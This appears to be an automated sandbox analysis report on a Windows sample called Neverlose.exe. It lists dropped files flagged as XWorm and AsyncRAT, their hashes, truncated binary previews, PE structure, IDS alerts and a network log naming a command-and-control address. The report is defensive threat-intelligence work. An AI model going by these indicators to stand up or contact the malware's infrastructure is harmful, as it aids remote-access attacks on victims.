  http://sp.zhabite.com/market/search/ | malicious | Unknown | 185.199.109.133, 140.82.121.4
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: C:\Users\user\AppData\Local\Temp\Solara.exe
  Solara.exe | malicious | XWorm
Match: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
  Vjy8d2EoqK.exe | malicious | Blank Grabber, DCRat, XWorm
  RdJ73GU3N1.exe | malicious | Njrat
  SolaraBootstrapper.exe | malicious | DCRat, XWorm
  QIjBj1l8We.exe | malicious | Blank Grabber
  6tGWMkdYv4.exe | malicious | Blank Grabber
Match: C:\Users\user\AppData\Roaming\sv_chost.exe
  Solara.exe | malicious | XWorm
                                                              Process:C:\Users\user\AppData\Local\Temp\Solara.exe
                                                              File Type:CSV text
                                                              Category:dropped
                                                              Size (bytes):654
                                                              Entropy (8bit):5.380476433908377
                                                              Encrypted:false
                                                              SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                              MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                              SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                              SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                              SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                              Malicious:false
                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                                                              Process:C:\Users\user\AppData\Roaming\sv_chost.exe
                                                              File Type:CSV text
                                                              Category:dropped
                                                              Size (bytes):654
                                                              Entropy (8bit):5.380476433908377
                                                              Encrypted:false
                                                              SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                              MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                              SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                              SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                              SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                              Malicious:false
                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                                                              Process:C:\Users\user\Desktop\Neverlose.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):522
                                                              Entropy (8bit):5.358731107079437
                                                              Encrypted:false
                                                              SSDEEP:12:Q3La/hz92n4M9tDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:MLU84qpE4KlKDE4KhKiKhk
                                                              MD5:93E4C46884CB6EE7CDCC4AACE78CDFAC
                                                              SHA1:29B12D9409BA9AFE4C949F02F7D232233C0B5228
                                                              SHA-256:2690023A62F22AB7B27B09351205BA31173B50B77ACA89A5759EDF29A1FB17F7
                                                              SHA-512:E9C3E2FCEE4E13F7776665295A4F6085002913E011BEEF32C8E7065140937DDE1963182B547CC75110BF32AE5130A6686D5862076D5FFED9241F183B9217FA4D
                                                              Malicious:true
                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..
                                                              Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:modified
                                                              Size (bytes):954
                                                              Entropy (8bit):5.350970057955659
                                                              Encrypted:false
                                                              SSDEEP:24:ML9E4KLE4KnKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKLHKnYHKh3oPtHo6hAHKzeR
                                                              MD5:3CE64235B0821B76294C3AD95F117E6C
                                                              SHA1:FD1EC471493CE132D0D719A9771739912BEF91BF
                                                              SHA-256:C5348C9009777CDF6C5CBD5D767A400932C0E1FA95F49DF8E797685754790850
                                                              SHA-512:DA80BE8655187998EB5425EC801E352C386891991A4575811DE365DFD38B1325DE95A540953EC6E9305E74B1A0560968729D742A01198540CFCC166635F104C5
                                                              Malicious:false
                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.IO.Compression.FileSystem, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:modified
                                                              Size (bytes):64
                                                              Entropy (8bit):0.34726597513537405
                                                              Encrypted:false
                                                              SSDEEP:3:Nlll:Nll
                                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                              Malicious:false
                                                              Preview:@...e...........................................................
                                                              Process:C:\Users\user\AppData\Local\Temp\Solara.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):41
                                                              Entropy (8bit):3.7195394315431693
                                                              Encrypted:false
                                                              SSDEEP:3:rRSFYJKXzovNsr4rNrn:EFYJKDoWrcBn
                                                              MD5:0DB526D48DAB0E640663E4DC0EFE82BA
                                                              SHA1:17AC435DAFEA6FF9F4D6F83FA6C54F9800F43724
                                                              SHA-256:934290A76F9E1804069D8ED6515B14101D9D8ABA2EACBF5B260F59941C65340E
                                                              SHA-512:FACD013E1B5B8163214CA8C3A18ADEEC3541153CD69240EEFA76DDD54809186E919C1D635AEA648A8641DE7C3216BEC11C41F04719B60F07EDFDC01FF79027B9
                                                              Malicious:false
                                                              Preview:....### explorer ###..[WIN]r[WIN]r[WIN]r
                                                              Process:C:\Users\user\Desktop\Neverlose.exe
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):84480
                                                              Entropy (8bit):5.979998885001342
                                                              Encrypted:false
                                                              SSDEEP:1536:RGz2iTckU6TRXXUMCxA1M+bIJqqKHzIlt28A6EVbSOo9y+:cysO6THM+bIJaAQ84bSOos+
                                                              MD5:8AC3D32DDD136180B75C36A39398F39F
                                                              SHA1:D3F37C1CF6DEA9C9F1A17D2D3E2788CB71D13502
                                                              SHA-256:645697F87E53786ED389243B7C493452D1F4DDE157741BBE27D31F4BD87F833B
                                                              SHA-512:0174DF5E68D0EBCC9E736D5574F02C622C108DD16C097DC6D1DD4D61134B0BAC775C63A70D0AA739085E31F5DDC75DD7F51CD9A938C15EAC09F7278BFC1CC283
                                                              Malicious:true
                                                              Yara Hits:
                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\Solara.exe, Author: Joe Security
                                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\Solara.exe, Author: ditekSHen
                                                              Antivirus:
                                                              • Antivirus: Avira, Detection: 100%
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 76%
                                                              Joe Sandbox View:
• Filename: Solara.exe, Detection: malicious
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.................@..........N_... ...`....@.. ....................................@..................................^..W....`............................................................................... ............... ..H............text...T?... ...@.................. ..`.rsrc........`.......B..............@..@.reloc...............H..............@..B................0_......H....... `..........&.....................................................(....*.r...p*. ....*..(....*.r5..p*. q.%.*.s.........s.........s.........s.........*.r...p*. *p{.*.rg..p*. _..*.r...p*. C.?.*.rz..p*. .j..*.r...p*. ..].*..((...*.r<..p*.r...p*. ^p..*"(....+.*&(....&+.*.+5sZ... .... .'..o[...(,...~....-.(G...(9...~....o\...&.-.*.r...p*. ....*.rp..p*. .`..*.r...p*. .=T.*.rd..p*. .j..*.r...p*. I.;.*.rX..p*. ....*..............j..................s]..............~.........*
                                                              Process:C:\Users\user\Desktop\Neverlose.exe
                                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):13312
                                                              Entropy (8bit):4.677524556734161
                                                              Encrypted:false
                                                              SSDEEP:192:konexQO0FoAWyEfJkVIaqaLHmr/XKT0ifnTJ1jvVXctNjA:HnexHAWyEfJoIaqayzKAifd1LVEj
                                                              MD5:6557BD5240397F026E675AFB78544A26
                                                              SHA1:839E683BF68703D373B6EAC246F19386BB181713
                                                              SHA-256:A7FECFC225DFDD4E14DCD4D1B4BA1B9F8E4D1984F1CDD8CDA3A9987E5D53C239
                                                              SHA-512:F2399D34898A4C0C201372D2DD084EE66A66A1C3EAE949E568421FE7EDADA697468EF81F4FCAB2AFD61EAF97BCB98D6ADE2D97295E2F674E93116D142E892E97
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 33%
                                                              Joe Sandbox View:
• Filename: Vjy8d2EoqK.exe, Detection: malicious
• Filename: RdJ73GU3N1.exe, Detection: malicious
• Filename: SolaraBootstrapper.exe, Detection: malicious
• Filename: QIjBj1l8We.exe, Detection: malicious
• Filename: 6tGWMkdYv4.exe, Detection: malicious
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....)............"...0..*...........I... ...`....@.. ....................................`.................................?I..O....`...............................H..8............................................ ............... ..H............text....)... ...*.................. ..`.rsrc........`.......,..............@..@.reloc...............2..............@..B................sI......H........'... ...........................................................0..;........r...p.(....(...............(...+}......~.......(......9...............(...+}.......}.......6}.......}...... ....}........0..{....+..}......~.......(...........,'.(......r'..p..(....(....(.......s....z..........(...+}.......~.......(....&......%.......%.......%..........+'.(......r=..p..(....(....(.......s....z..*6..(.........*....0...........(....o......rS..p(.........+8...........o..........
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Users\user\AppData\Local\Temp\Solara.exe
                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Aug 24 18:56:25 2024, mtime=Sat Aug 24 18:56:25 2024, atime=Sat Aug 24 18:56:25 2024, length=84480, window=hide
                                                              Category:dropped
                                                              Size (bytes):771
                                                              Entropy (8bit):5.087787805776581
                                                              Encrypted:false
                                                              SSDEEP:12:86656/l/si4GvgWCyB8dY//H+wl/y9dL30D/DjA3mrHmNeDEw8XBmV:8Rk/l/CGvLu+js9p30D/AWQeYw8XBm
                                                              MD5:7DA92340652284F276C4CC04ACE799B4
                                                              SHA1:5B2BFA0400C5A540C0A4AE0AB4FE9B2910115CC2
                                                              SHA-256:2A36B49CC3D5F57E861C8AA1DE4973D44FBE8460BA138622A9CDD7DDD3FD746B
                                                              SHA-512:7E7CB1599EBE7373476FDA94751856C8E654BACE9000AB79BC87FA463E2A5ED4E0BA0B38B8895449D3EBE50488DDBB405BC4AD9E8A77299F0FAE804746AFC090
                                                              Malicious:false
                                                              Preview:L..................F.... ...P._...P._...P._....J......................z.:..DG..Yr?.D..U..k0.&...&......vk.v....gC.y_...b..._.......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y............................%..A.p.p.D.a.t.a...B.V.1......Y...Roaming.@......CW.^.Y............................6..R.o.a.m.i.n.g.....f.2..J...Y.. .sv_chost.exe..J.......Y...Y............................(2.s.v._.c.h.o.s.t...e.x.e.......Z...............-.......Y....................C:\Users\user\AppData\Roaming\sv_chost.exe........\.....\.....\.....\.....\.s.v._.c.h.o.s.t...e.x.e.`.......X.......123991...........hT..CrF.f4... .$...Rb...,.......hT..CrF.f4... .$...Rb...,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                              Process:C:\Users\user\AppData\Local\Temp\Solara.exe
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):84480
                                                              Entropy (8bit):5.979998885001342
                                                              Encrypted:false
                                                              SSDEEP:1536:RGz2iTckU6TRXXUMCxA1M+bIJqqKHzIlt28A6EVbSOo9y+:cysO6THM+bIJaAQ84bSOos+
                                                              MD5:8AC3D32DDD136180B75C36A39398F39F
                                                              SHA1:D3F37C1CF6DEA9C9F1A17D2D3E2788CB71D13502
                                                              SHA-256:645697F87E53786ED389243B7C493452D1F4DDE157741BBE27D31F4BD87F833B
                                                              SHA-512:0174DF5E68D0EBCC9E736D5574F02C622C108DD16C097DC6D1DD4D61134B0BAC775C63A70D0AA739085E31F5DDC75DD7F51CD9A938C15EAC09F7278BFC1CC283
                                                              Malicious:true
                                                              Yara Hits:
                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\sv_chost.exe, Author: Joe Security
                                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\sv_chost.exe, Author: ditekSHen
                                                              Antivirus:
                                                              • Antivirus: Avira, Detection: 100%
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 76%
                                                              Joe Sandbox View:
                                                              • Filename: Solara.exe, Detection: malicious, Browse
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.................@..........N_... ...`....@.. ....................................@..................................^..W....`............................................................................... ............... ..H............text...T?... ...@.................. ..`.rsrc........`.......B..............@..@.reloc...............H..............@..B................0_......H....... `..........&.....................................................(....*.r...p*. ....*..(....*.r5..p*. q.%.*.s.........s.........s.........s.........*.r...p*. *p{.*.rg..p*. _..*.r...p*. C.?.*.rz..p*. .j..*.r...p*. ..].*..((...*.r<..p*.r...p*. ^p..*"(....+.*&(....&+.*.+5sZ... .... .'..o[...(,...~....-.(G...(9...~....o\...&.-.*.r...p*. ....*.rp..p*. .`..*.r...p*. .=T.*.rd..p*. .j..*.r...p*. I.;.*.rX..p*. ....*..............j..................s]..............~.........*
                                                              Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                              File Type:ASCII text, with CRLF, LF line terminators
                                                              Category:dropped
                                                              Size (bytes):1776
                                                              Entropy (8bit):3.5480492848009324
                                                              Encrypted:false
                                                              SSDEEP:24:AHq6saJQXQK6zkp5nFC3xtKEcfyNodeI5nFC3udee:6s/Xv6zklC3aEoy+de2C3udee
                                                              MD5:7264ED58A430BF80CED4FE4977A81ABE
                                                              SHA1:AC73A7FC9C993F27494651FD56FC9289F5C54F03
                                                              SHA-256:3BECF43647028907B5DF24E41012AD21AD4CBFC3DC639C73BA7219B5241EE269
                                                              SHA-512:688723E77658A9032D807BF8FBA514B246EA2B7A9E371BA1F6C7DF2BAF4DBA831AED5586CA149AE29C85427EF1592238E9516BD309D47B328D65D73D75DF9C33
                                                              Malicious:false
                                                              Preview: ,gg, .. i8""8i ,dPYb, .. `8,,8' IP'`Yb .. `88' I8 8I .. dP"8, I8 8' .. dP' `8a ,ggggg, I8 dP ,gggg,gg ,gggggg, ,gggg,gg .. dP' `Yb dP" "Y8gggI8dP dP" "Y8I dP""""8I dP" "Y8I .._ ,dP' I8 i8' ,8I I8P i8' ,8I ,8' 8I i8' ,8I .."888,,____,dP,d8, ,d8' ,d8b,_ ,d8, ,d8b,,dP Y8,,d8, ,d8b,..a8P"Y88888P" P"Y8888P" 8P'"Y88P"Y8888P"`Y88P `Y8P"Y8888P"`Y8.. .. .. .. ..
                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Entropy (8bit):7.989223506654496
                                                              TrID:
                                                              • Win32 Executable (generic) a (10002005/4) 99.94%
                                                              • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                              • DOS Executable Generic (2002/1) 0.02%
                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                              File name:Neverlose.exe
                                                              File size:1'189'376 bytes
                                                              MD5:39d6ec26690ffee2e74fb9694b30453c
                                                              SHA1:85a689c84e3a6584ed2cfca6da05c54a7ebfeb18
                                                              SHA256:4bf2d648bf901a9c4f26b43f85e26b6659e22657a3d308dea668de43fed2dfdb
                                                              SHA512:184347e37d40f14b210dc5838b0894dcacd746a7af8e68846ebe0ab7794e5c8a24b8d3a2d276c8a06901fbab3fd13f8bca8da37617ecab198c75232d7aee086e
                                                              SSDEEP:24576:dqwa7YmN2K1EFitGs4/ak66Z9c801j5F/:dF5mNl1YMPJ+9cF1jD/
                                                              TLSH:AB45331392D52804CCBE727473EFE71FB2AB21B7AAF7880DBE959D56680409BE444DC4
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f............................m.... ........@.. ........................7...........@................................
                                                              Icon Hash:90cececece8e8eb0
                                                              Entrypoint:0x41036d
                                                              Entrypoint Section:
                                                              Digitally signed:false
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                              Time Stamp:0x66C6DD90 [Thu Aug 22 06:41:20 2024 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:4
                                                              OS Version Minor:0
                                                              File Version Major:4
                                                              File Version Minor:0
                                                              Subsystem Version Major:4
                                                              Subsystem Version Minor:0
                                                              Import Hash:2e5467cba76f44a088d39f78c5e807b6
Instruction
push ebp
mov ebp, esp
add esp, FFFFFFF0h
mov eax, 00401000h
call 00007FE5C13D0AB6h
call far 5DE5h : 8B10C483h
jmp 00007FE5C173D1F8h
cwde
aas
aam 95h
push 00000056h
mov cl, 42h
and dword ptr [ecx-0E27C25Ch], 53h
dec ecx
mov edx, 93464AD7h
fld qword ptr [esi-2E888BF0h]
clc
nop
inc edi
inc ebp
aam 0Fh
jnp 00007FE5C13D0A53h
enter E84Eh, 2Dh
pushfd
or eax, 9FA99F8Ah
xchg eax, edi
jns 00007FE5C13D0AB1h
cmp cl, byte ptr [ecx-47h]
inc edi
bound edx, dword ptr [eax-66842CCAh]
jp 00007FE5C13D0AC8h
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x298020 | 0x210 | .data
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x16000 | 0x4c8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x298000 | 0xc | .data
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
 | 0x2000 | 0x10000 | 0x10000 | 504cb1489c19fe6633182dcc42d75212 | False | 1.000396728515625 | data | 7.99709234138958 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
 | 0x12000 | 0x2000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
 | 0x14000 | 0x2000 | 0x200 | 870484c1f4c6c68a73a5f22669fa6139 | False | 1.021484375 | data | 7.501912508388803 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x16000 | 0x2000 | 0x600 | 9b7d62c0a77ff5b5b7a702703957c42f | False | 0.3723958333333333 | data | 3.6952548279889683 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
 | 0x18000 | 0x280000 | 0x2ba00 | 0173ee7ae3ccefb5a6378710b351ecc3 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.data | 0x298000 | 0xe6000 | 0xe6000 | 26e6bac610bd6b2ebc38659cb3de9db9 | False | 0.9972337805706522 | data | 7.984098571143187 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x160a0 | 0x23c | data | | | 0.4755244755244755
RT_MANIFEST | 0x162dc | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5469387755102041
DLL | Import
kernel32.dll | GetModuleHandleA, GetProcAddress, ExitProcess, LoadLibraryA
user32.dll | MessageBoxA
advapi32.dll | RegCloseKey
oleaut32.dll | SysFreeString
gdi32.dll | CreateFontA
shell32.dll | ShellExecuteA
version.dll | GetFileVersionInfoA
mscoree.dll | _CorExeMain
Timestamp | Protocol | SID | Signature | Severity | Source Port | Dest Port | Source IP | Dest IP
2024-08-24T21:55:06.804547+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 49732 | 443 | 192.168.2.4 | 140.82.121.4
2024-08-24T21:57:03.276679+0200 | TCP | 2855924 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 49741 | 14520 | 192.168.2.4 | 147.185.221.22
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                              Aug 24, 2024 21:55:06.987301111 CEST49732443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:06.987307072 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.987435102 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.987462044 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.987493992 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.987502098 CEST49732443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:06.987509966 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.987550974 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.987581968 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.987591982 CEST49732443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:06.987615108 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.987654924 CEST49732443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:06.988382101 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.988461018 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.988497019 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.988504887 CEST49732443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:06.988512993 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.988549948 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.988552094 CEST49732443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:06.988559961 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.988600969 CEST49732443192.168.2.4140.82.121.4
                                                              Aug 24, 2024 21:55:06.988605976 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.989290953 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.989326000 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.989361048 CEST44349732140.82.121.4192.168.2.4
                                                              Aug 24, 2024 21:55:06.989392996 CEST44349732140.82.121.4192.168.2.4
